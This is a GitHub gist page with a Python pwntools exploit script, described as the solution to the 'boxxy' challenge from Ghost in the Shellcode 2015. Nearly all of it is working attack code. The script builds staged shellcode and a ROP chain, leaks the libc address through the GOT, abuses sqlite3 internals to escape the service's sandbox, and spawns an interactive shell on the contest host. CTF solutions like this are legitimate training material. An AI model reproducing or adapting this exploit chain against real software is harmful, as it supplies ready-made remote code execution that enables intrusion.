Created
January 18, 2015 21:33
-
-
Save kokjo/e2c61cdbe81e2c359d9a to your computer and use it in GitHub Desktop.
Solution of boxxy from GITS2015
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch = 'i386', os = 'linux') | |
| elf = ELF('boxxy') | |
| rop = ROP(elf) | |
| libc = ELF("libc.so.6") | |
| libc_rop = ROP(libc) | |
| HOST = 'localhost' | |
| HOST = 'boxxy.2015.ghostintheshellcode.com' | |
| sock = remote(HOST, 10101) | |
| sock.recvuntil("> ") | |
| fd = 5 if HOST == 'localhost' else 4 | |
| fd = 4 | |
| rfd = fd - 1 | |
| wfd = fd + 3 | |
| stage1 = asm(''' | |
| popa | |
| jmp esp | |
| ''') | |
| offset = 0x80 | |
| got_write = elf.got["write"] | |
| stage3 = shellcraft.syscall('SYS_write', fd, 'esp', 0x1000) | |
| stage3 = asm(stage3) | |
| stage3 = asm(''' | |
| mov ebx, %(fd)d | |
| mov ecx, %(got_write)d | |
| mov edx, 4 | |
| mov eax, SYS_write | |
| int 0x80 | |
| mov ebx, %(fd)d | |
| mov ecx, esp | |
| mov edx, 0x1000 | |
| mov eax, SYS_read | |
| int 0x80 | |
| mov edx, eax | |
| mov ebx, %(wfd)d | |
| mov ecx, esp | |
| mov eax, SYS_write | |
| int 0x80 | |
| jmp $ | |
| ''' % locals()) | |
| stage2 = shellcraft.syscall('SYS_read', fd, elf.bss(offset), len(stage3)) | |
| stage2 += 'mov eax, %d\n' % elf.bss(offset) | |
| stage2 += 'call eax' | |
| stage2 = asm(stage2) | |
| for i, c in enumerate(stage1): | |
| rop.sprintf(elf.bss(offset + i), elf.search(c).next()) | |
| rop.call(elf.bss(offset)) | |
| payload = stage2.ljust(115, '\xf4') + str(rop) + '\xf4' * (6 * 4) | |
| payload = payload + stage2 | |
| stage5 = asm(shellcraft.findpeersh()) | |
| stage4 = shellcraft.syscall('SYS_read', fd, elf.bss(0), len(stage5)) | |
| stage4 += "mov eax, %d\n" % elf.bss(0) | |
| stage4 += "call eax" | |
| stage4 = asm(stage4) | |
| # gdb.attach(sock, execute = ''' | |
| # # b readUntil | |
| # # b *0x804c0dd | |
| # # b open_db | |
| # c | |
| # ''') | |
| #masterpid = pidof('boxxy')[-2] | |
| sock.sendline('search %s' % payload) | |
| sock.clean() | |
| sock.send(stage3) | |
| OPEN_DB, PREP_QUERY, QUERY_DB, RAND_REC, CLOSE_DB, EXIT_FUNC = range(6) | |
| SQLITE3_OPEN_MAGIC = 0xa029a697 | |
| libc_write = u32(sock.recvn(4)) | |
| libc_base = libc_write - libc.symbols["write"] | |
| ret_44 = libc_rop.ret_44 | |
| ret_44_addr = libc_base+ret_44[0] | |
| #print hex(libc_base), hex(ret_44_addr), ret_44 | |
| #gdb.attach(masterpid, execute = """ | |
| # b prep_query | |
| #disp/64wx $eax | |
| #b *(close_db + 30) | |
| #b *(query_db + 124) | |
| #b *%(ret_44_addr)d | |
| # | |
| #c | |
| #""" % locals()) | |
| q = 'A' * 8 + asm("jmp $+100").ljust(18*4, "\x00") + p32(SQLITE3_OPEN_MAGIC) | |
| q += stage4.rjust(112, "\x90") | |
| q += p32(ret_44_addr) | |
| sock.send(flat([ | |
| CLOSE_DB, 0, | |
| PREP_QUERY, len(q), q, | |
| CLOSE_DB, 0])) | |
| sock.clean() | |
| sock.send(stage5) | |
| sock.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment